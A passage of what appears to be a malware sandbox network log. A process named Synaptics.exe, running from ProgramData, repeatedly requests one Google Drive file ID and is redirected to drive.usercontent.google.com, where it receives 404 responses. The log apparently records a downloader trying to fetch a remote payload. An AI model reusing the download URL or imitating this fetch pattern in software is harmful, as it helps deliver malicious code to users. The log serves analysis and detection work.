                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49868 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:31 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PmJB4nBlnGIqasG5NcVAZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49869 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:31 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ixhOonxcsywuFsO1ly1Q4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 49870 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:32 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5tB4ZSa22yKLtARIbndnmCJ_oZwwz63dpCk6Q_ClVYxd45NWERMSX98p1rv-5YSq8ofNhGwZQ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EaziQ_cIt_9Dlp5jb-QkzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:32 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:32 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="DctD6A-2EAiLgl6rvb_9Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:32 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 49873 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KK017dvD5YDlc2gtgr9aww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    83 | 192.168.2.4 | 49872 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC729wdkrE3hx8FyEGT0hnE-4MeTLK1MKnDV4cFtLG8bZ-wtfmQzpbuxegoYmQxJxJ6V
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-t4qd5EpHE6LSIUYWXf1fuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="avqQDpd0pxkmNWNN4J9dKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    84 | 192.168.2.4 | 49874 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TATrBJ69shn1HH_BGAhG2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    85 | 192.168.2.4 | 49875 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:32 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7sj2j0nbUHWk1a5MgCGDq7rq6fA_d6BnPp2IlmRb9N17Ccrw-Bk9CY9lue5ylHeftKDl3sDyo
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:32 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-B-5r0DGtruTCPj1clq-u1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="NlWpwx7rg_tBi0JrEf7WMQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    86 | 192.168.2.4 | 49878 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5q4kGZrqZ6KrQvvt09SfjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 49879 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:33 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:33 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6H__jp48lMPl_U3TEFh-FoqSc_MvrIze9ez4eSG4gcR3B17k6gHjs1gX-KasSHhGU-
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yMgLJlmvrUBIyazQiUz9OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:33 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:33 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="v-Gzv4mRnhRb3sltQBkQxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:33 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 49880 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:33 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
